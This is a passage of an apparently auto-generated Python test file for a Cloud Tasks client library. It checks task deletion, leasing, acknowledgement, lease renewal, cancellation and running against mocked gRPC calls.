# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.LeaseTasksRequest, dict,])
def test_lease_tasks(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.LeaseTasksResponse()
response = client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.LeaseTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, cloudtasks.LeaseTasksResponse)
def test_lease_tasks_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
client.lease_tasks()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.LeaseTasksRequest()
@pytest.mark.asyncio
async def test_lease_tasks_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.LeaseTasksRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.LeaseTasksResponse()
)
response = await client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.LeaseTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, cloudtasks.LeaseTasksResponse)
@pytest.mark.asyncio
async def test_lease_tasks_async_from_dict():
await test_lease_tasks_async(request_type=dict)
def test_lease_tasks_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.LeaseTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
call.return_value = cloudtasks.LeaseTasksResponse()
client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_lease_tasks_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.LeaseTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.LeaseTasksResponse()
)
await client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_lease_tasks_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.LeaseTasksResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.lease_tasks(
parent="parent_value", lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
def test_lease_tasks_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.lease_tasks(
cloudtasks.LeaseTasksRequest(),
parent="parent_value",
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.asyncio
async def test_lease_tasks_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.LeaseTasksResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.lease_tasks(
parent="parent_value", lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
@pytest.mark.asyncio
async def test_lease_tasks_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.lease_tasks(
cloudtasks.LeaseTasksRequest(),
parent="parent_value",
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.AcknowledgeTaskRequest, dict,])
def test_acknowledge_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.AcknowledgeTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_acknowledge_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
client.acknowledge_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.AcknowledgeTaskRequest()
@pytest.mark.asyncio
async def test_acknowledge_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.AcknowledgeTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.AcknowledgeTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_acknowledge_task_async_from_dict():
await test_acknowledge_task_async(request_type=dict)
def test_acknowledge_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.AcknowledgeTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
call.return_value = None
client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_acknowledge_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.AcknowledgeTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_acknowledge_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.acknowledge_task(
name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
def test_acknowledge_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.acknowledge_task(
cloudtasks.AcknowledgeTaskRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.asyncio
async def test_acknowledge_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.acknowledge_task(
name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
@pytest.mark.asyncio
async def test_acknowledge_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.acknowledge_task(
cloudtasks.AcknowledgeTaskRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.RenewLeaseRequest, dict,])
def test_renew_lease(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RenewLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_renew_lease_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
client.renew_lease()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RenewLeaseRequest()
@pytest.mark.asyncio
async def test_renew_lease_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.RenewLeaseRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RenewLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_renew_lease_async_from_dict():
await test_renew_lease_async(request_type=dict)
def test_renew_lease_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RenewLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
call.return_value = task.Task()
client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_renew_lease_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RenewLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.renew_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_renew_lease_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.renew_lease(
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
def test_renew_lease_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.renew_lease(
cloudtasks.RenewLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.asyncio
async def test_renew_lease_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.renew_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.renew_lease(
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
@pytest.mark.asyncio
async def test_renew_lease_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.renew_lease(
cloudtasks.RenewLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.CancelLeaseRequest, dict,])
def test_cancel_lease(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CancelLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_cancel_lease_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
client.cancel_lease()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CancelLeaseRequest()
@pytest.mark.asyncio
async def test_cancel_lease_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.CancelLeaseRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CancelLeaseRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_cancel_lease_async_from_dict():
await test_cancel_lease_async(request_type=dict)
def test_cancel_lease_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CancelLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
call.return_value = task.Task()
client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_cancel_lease_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CancelLeaseRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.cancel_lease(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_cancel_lease_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.cancel_lease(
name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
def test_cancel_lease_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.cancel_lease(
cloudtasks.CancelLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.asyncio
async def test_cancel_lease_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_lease), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.cancel_lease(
name="name_value", schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
assert TimestampRule().to_proto(
args[0].schedule_time
) == timestamp_pb2.Timestamp(seconds=751)
@pytest.mark.asyncio
async def test_cancel_lease_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.cancel_lease(
cloudtasks.CancelLeaseRequest(),
name="name_value",
schedule_time=timestamp_pb2.Timestamp(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.RunTaskRequest, dict,])
def test_run_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_run_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
client.run_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
@pytest.mark.asyncio
async def test_run_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.RunTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_run_task_async_from_dict():
await test_run_task_async(request_type=dict)
def test_run_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
call.return_value = task.Task()
client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_run_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_run_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
